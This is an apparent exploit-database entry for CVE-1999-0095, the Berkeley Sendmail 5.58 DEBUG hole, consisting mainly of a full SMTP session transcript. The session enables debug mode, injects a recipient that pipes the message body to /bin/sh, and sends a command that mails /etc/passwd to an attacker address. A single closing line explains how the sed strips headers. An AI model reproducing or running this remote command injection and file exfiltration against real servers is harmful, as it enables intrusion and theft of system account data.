Berkeley Sendmail 5.58 - Debug

Author: anonymous
type: remote
platform: linux
port: 
date_added: 1988-08-01  
date_updated: 2017-09-25  
verified: 1  
codes: OSVDB-195;CVE-1999-0095  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19028.txt  

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail evil@attacker.com </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

The sed in the receipient strips all mail headers from the
message before passing it on to the shell.